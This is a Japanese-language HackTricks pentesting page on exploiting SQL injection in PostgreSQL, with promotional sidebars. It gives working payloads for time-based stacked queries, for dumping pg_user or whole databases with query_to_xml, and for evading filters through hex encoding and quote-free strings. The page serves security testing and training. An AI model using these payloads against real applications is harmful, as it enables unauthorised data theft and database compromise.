hacktricks/pentesting-web/sql-injection/postgresql-injection
2024-02-05 02:58:30 +00:00
..
big-binary-files-upload-postgresql.md Translated ['pentesting-web/hacking-with-cookies/cookie-bomb.md', 'pente 2024-01-10 17:17:21 +00:00
dblink-lo_import-data-exfiltration.md Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:58:30 +00:00
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md Translated ['pentesting-web/hacking-with-cookies/cookie-bomb.md', 'pente 2024-01-10 17:17:21 +00:00
pl-pgsql-password-bruteforce.md Translated to Japanese 2023-07-07 23:42:27 +00:00
rce-with-postgresql-extensions.md Translated to Japanese 2023-07-07 23:42:27 +00:00
rce-with-postgresql-languages.md Translated to Japanese 2023-07-07 23:42:27 +00:00
README.md Translated ['pentesting-web/deserialization/nodejs-proto-prototype-pollu 2024-01-01 19:09:41 +00:00

PostgreSQLインジェクション

AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください!

HackTricksをサポートする他の方法:


バグバウンティのヒント: Intigriti登録する、ハッカーによって作られたプレミアムなバグバウンティプラットフォーム!今日https://go.intigriti.com/hacktricksに参加して、最大**$100,000**の報酬を獲得し始めましょう!

{% embed url="https://go.intigriti.com/hacktricks" %}


このページは、postgresqlデータベースで見つかったSQLインジェクションを悪用するのに役立つさまざまなコツを説明することを目的としています。また、 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md で見つけることができるコツを補完します。

ネットワークインタラクション - 権限昇格、ポートスキャナー、NTLMチャレンジレスポンスの漏洩 & データ流出

dblinkは、攻撃者の観点からいくつかの興味深いオプションを提供するPostgreSQLモジュールです。他のPostgreSQLインスタンスに接続するためやTCP接続を実行するために使用できます。
これらの機能は**COPY FROM機能と組み合わせて、権限を昇格させる**、ポートスキャンを実行する、またはNTLMチャレンジレスポンスを取得するために使用できます。
これらの攻撃を実行する方法はこちらで読むことができます。

dblinkと大きなオブジェクトを使用したデータ流出の例

大きなオブジェクト内にデータをロードし、その後大きなオブジェクトの内容を関数dblink_connectのユーザー名内に流出させるCTFの例をこちらで読むことができます。

PostgreSQL攻撃: 読み取り/書き込み、RCE、権限昇格

PostgreSQLからホストを侵害し、権限を昇格させる方法については、以下を確認してください:

{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}

WAFバイパス

PostgreSQL文字列関数

文字列を操作することで、WAFやその他の制限をバイパスするのに役立つかもしれません。
このページでは、いくつかの便利な文字列関数を見つけることができます。

スタックされたクエリ

postgresqlはスタックされたクエリをサポートしていることを覚えておいてくださいが、1つのレスポンスを期待している場合に2つのレスポンスが返されると、いくつかのアプリケーションはエラーを投げるでしょう。しかし、タイムインジェクションを介してスタックされたクエリを依然として悪用することができます

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XML トリック

query_to_xml

この関数は、すべてのデータを1つのファイルにXML形式で返します。多量のデータを1行でダンプしたい場合に理想的です。

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

この関数は、データベース全体をXML形式で1行にダンプしますデータベースが非常に大きい場合は注意してください。DoS攻撃を引き起こしたり、自分のクライアントをダウンさせる可能性があります

SELECT database_to_xml(true,true,'');

文字列を16進数で

クエリ文字列内で実行できる場合(例えば、query_to_xml 関数を使用する場合)、convert_from を使用して文字列を16進数として渡し、この方法でフィルターをバイパスできます

{% code overflow="wrap" %}

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

{% endcode %}

引用符が禁止されている場合

ペイロードに引用符を使用できない場合、基本的な句(文字の連結はSELECT、INSERT、DELETEなどの基本的なクエリにのみ機能し、すべてのSQLステートメントに対して機能するわけではありません)にCHRでこれをバイパスできます:

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

または $ を使用します。これらのクエリは同じ結果を返します:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">
**バグバウンティのヒント**: **Intigriti**に**登録**しましょう。ハッカーによって作られたプレミアムな**バグバウンティプラットフォームです**!今すぐ[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)に参加して、最大**$100,000**のバウンティを獲得し始めましょう!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>で!</strong></summary>

HackTricksをサポートする他の方法:

* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックしてください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有**してください。

</details>